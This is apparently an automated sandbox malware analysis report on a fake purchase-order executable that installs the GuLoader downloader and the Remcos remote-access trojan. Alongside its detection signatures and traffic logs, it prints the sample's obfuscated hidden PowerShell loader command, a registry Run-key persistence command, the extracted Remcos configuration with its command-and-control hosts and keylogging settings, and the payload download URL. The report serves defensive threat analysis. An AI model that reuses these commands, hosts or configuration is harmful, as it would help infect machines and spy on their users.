Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe

Overview

General Information

Sample name:Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
Analysis ID:1431988
MD5:edeb34f392872f3c9e220bc9dcf9ba86
SHA1:e9fb6ff7cd47ec7b08391f4c1ecc1e684bf28ff7
SHA256:39e37a6736984b617a47818ffdbd202199c75f769821d4939f1d61dff621098d
Tags:exe
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Obfuscated command line found
Powershell drops PE file
Sample uses process hollowing technique
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe" MD5: EDEB34F392872F3C9E220BC9DCF9BA86)
    • powershell.exe (PID: 6472 cmdline: "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6332 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 2644 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • cmd.exe (PID: 6412 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 5492 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • wab.exe (PID: 6908 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iqylzxvzgukwqzib" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 612 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 5996 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lkdwaqoatccasgefpzj" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 5248 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 3352 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vmqobizuhkvfdmsjykvozo" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 4920 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 6212 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qtegxhlgdhz" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 5928 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6212 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 2688 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\awsyyzwhrprlrb" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 6564 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cqxrzshbfxjqbhhfak" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 6932 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hhytwjmog" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 5352 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6932 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 4372 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sbdlxbwhukxba" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 352 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uvjexuhjqspgcijx" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 2056 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 352 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 6304 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zmkgulmo" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3004 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3064 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2612 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mjdrowijunwwlk" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "learfo55ozj01.duckdns.org:29871:0learfo55ozj01.duckdns.org:29872:1learfo55ozj02.duckdns.org:29872:1", "Assigned name": "Top", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alpwovnb-G3F5OR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mqerms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\mqerms.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000003.2945584583.0000000009A7C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000002.00000002.2927351766.0000000009F92000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: wab.exe PID: 2644JoeSecurity_RemcosYara detected Remcos RATJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 2644, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)", ProcessId: 6412, ProcessName: cmd.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5492, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Emraud
            Sigma detected: Direct Autorun Keys Modification
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6412, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)", ProcessId: 5492, ProcessName: reg.exe
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6472, TargetFilename: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
            Sigma detected: Potential Dosfuscation Activity
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6472, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", ProcessId: 6332, ProcessName: cmd.exe
            Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 2644, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)", ProcessId: 6412, ProcessName: cmd.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)", CommandLine: "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe", ParentImage: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, ParentProcessId: 6516, ParentProcessName: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)", ProcessId: 6472, ProcessName: powershell.exe

            Snort Signatures

            Timestamp:04/26/24-07:44:24.601980
            SID:2032776
            Source Port:49708
            Destination Port:29871
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/26/24-07:44:24.894704
            SID:2032777
            Source Port:29871
            Destination Port:49708
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: https://ricohltd.top/aCqwFQDQz144.binAvira URL Cloud: Label: malware
            Source: https://ricohltd.top/aCqwFQDQz144.bin-_Avira URL Cloud: Label: malware
            Source: learfo55ozj01.duckdns.orgAvira URL Cloud: Label: malware
            Source: https://ricohltd.top/-Avira URL Cloud: Label: malware
            Source: https://ricohltd.top/Avira URL Cloud: Label: malware
            Found malware configuration
            Source: 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "learfo55ozj01.duckdns.org:29871:0learfo55ozj01.duckdns.org:29872:1learfo55ozj02.duckdns.org:29872:1", "Assigned name": "Top", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alpwovnb-G3F5OR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mqerms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Multi AV Scanner detection for domain / URL
            Source: learfo55ozj01.duckdns.orgVirustotal: Detection: 12%Perma Link
            Source: ricohltd.topVirustotal: Detection: 19%Perma Link
            Source: https://ricohltd.top/aCqwFQDQz144.binVirustotal: Detection: 18%Perma Link
            Source: learfo55ozj01.duckdns.orgVirustotal: Detection: 12%Perma Link
            Source: https://ricohltd.top/Virustotal: Detection: 19%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeReversingLabs: Detection: 26%
            Source: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeVirustotal: Detection: 27%Perma Link
            Multi AV Scanner detection for submitted file
            Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeVirustotal: Detection: 27%Perma Link
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.2945584583.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2644, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeJoe Sandbox ML: detected
            Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.191.112:443 -> 192.168.2.6:49707 version: TLS 1.2
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.2923098281.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.2926478638.0000000008029000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2905272578.000000000069C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2905272578.000000000069C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2923098281.0000000006F08000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_00405FE2 FindFirstFileA,FindClose,0_2_00405FE2
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559E
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\salpetersyrefabrikkers\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.6:49708 -> 193.222.96.21:29871
            Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 193.222.96.21:29871 -> 192.168.2.6:49708
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: learfo55ozj01.duckdns.org
            Connects to many ports of the same IP (likely port scanning)
            Source: global trafficTCP traffic: 193.222.96.21 ports 29871,1,2,7,8,9
            Uses dynamic DNS services
            Source: unknownDNS query: name: learfo55ozj01.duckdns.org
            Source: global trafficTCP traffic: 192.168.2.6:49708 -> 193.222.96.21:29871
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewIP Address: 193.222.96.21 193.222.96.21
            Source: Joe Sandbox ViewASN Name: SWISSCOMSwisscomSwitzerlandLtdCH SWISSCOMSwisscomSwitzerlandLtdCH
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /aCqwFQDQz144.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ricohltd.topCache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /aCqwFQDQz144.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ricohltd.topCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: ricohltd.top
            Source: global trafficDNS traffic detected: DNS query: learfo55ozj01.duckdns.org
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpP
            Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpe
            Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpen
            Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gprfo2
            Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000000.2054692266.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000000.2054692266.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
